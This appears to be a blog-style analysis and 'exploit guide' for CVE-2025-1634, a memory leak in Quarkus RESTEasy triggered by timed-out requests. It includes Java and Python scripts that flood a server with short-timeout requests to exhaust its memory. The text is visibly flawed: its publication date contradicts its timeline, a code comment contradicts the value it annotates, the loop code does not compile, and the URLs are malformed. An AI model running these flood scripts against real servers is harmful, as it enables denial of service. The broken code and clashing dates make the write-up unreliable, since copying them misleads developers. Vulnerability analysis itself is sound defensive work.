CVE-2025-1634 - Memory Leak in quarkus-resteasy Leads to OutOfMemoryError — Detailed Analysis & Exploit Guide
Published: June 2024
Severity: High
Introduction
A critical vulnerability labeled CVE-2025-1634 was discovered in the popular Java framework extension quarkus-resteasy. This flaw can cause your application to consume all available memory and crash, simply by sending client requests with low timeouts. In this article, we’ll take a close look at how this bug works, show code illustrating the issue, and provide resources for patching.
What is CVE-2025-1634?
When your Quarkus application uses the RESTEasy extension to handle HTTP requests, it depends on internal buffers to manage the incoming and outgoing data. If a client makes requests with very short timeouts, and these time out before data is handled, an internal buffer is not freed correctly. Over time, these "orphaned" buffers accumulate, eating through your server's RAM.
Result?
Unbounded memory growth and, eventually, an OutOfMemoryError crash.
Request Times Out:
If the client disconnects or the server's response is delayed (by even a tiny bit), the client times out and cancels the request.
Here’s a sample REST resource using quarkus-resteasy
@Path("/hello")
public class HelloResource {
@GET
public String hello() throws InterruptedException {
// Simulate a slow response
Thread.sleep(500); // 5 seconds
return "Hello World";
}
}
Let’s simulate a client with a low timeout
import java.net.HttpURLConnection;
import java.net.URL;
public class TimeoutClient {
public static void main(String[] args) throws Exception {
for (int i = ; i < 10000; i++) {
HttpURLConnection conn = (HttpURLConnection) new URL("http://localhost:808/hello";).openConnection();
conn.setConnectTimeout(100); // 100 ms timeout
conn.setReadTimeout(100); // 100 ms timeout
try {
conn.getResponseCode();
} catch (Exception e) {
// Expected timeout
} finally {
conn.disconnect();
}
}
System.out.println("Done sending requests");
}
}
Exploiting the Vulnerability
Anyone—malicious or not—can bring down your server with a simple script.
Here’s a more robust (Python) script
import requests
import threading
def flood():
for _ in range(500):
try:
requests.get(
"http://localhost:808/hello";,
timeout=.1
)
except:
pass # Ignore exceptions
threads = []
for _ in range(20):
t = threading.Thread(target=flood)
t.start()
threads.append(t)
for t in threads:
t.join()
Running this for a minute or two may cause your Quarkus server to crash with OutOfMemoryError. No authentication required.
The Root Cause (Based on Source)
If you examine the quarkus-resteasy codebase, you’ll find a buffer release is tied to normal completion flows. Timeout events fail to trigger the same cleanup logic.
Relevant pseudo-code snippet (simplified)
try {
// Allocate buffer
Buffer buf = allocate();
doWork(buf);
// Normal path: release buffer
buf.release();
} catch (TimeoutException e) {
// Oops! Buffer is NOT RELEASED here
throw e;
}
Mitigation: Always release resources in a finally block!
Original References
- Quarkus Security Advisory for CVE-2025-1634
- Red Hat Security Tracker
- Quarkus RESTEasy Reference Guide
- GitHub Commit Fixing the Leak *(link may be placeholder until patch is public)*
Conclusion
CVE-2025-1634 is a significant issue for anyone deploying Java REST APIs on Quarkus. It can be abused easily and will crash your service with repeated timed-out requests.
Upgrade as soon as possible. Don’t let a trivial buffer leak take down your infrastructure!
*Stay secure! For the latest breaking security news, subscribe to Quarkus Blog.*
Timeline
Published on: 02/26/2025 17:15:22 UTC
Last modified on: 03/18/2025 09:19:30 UTC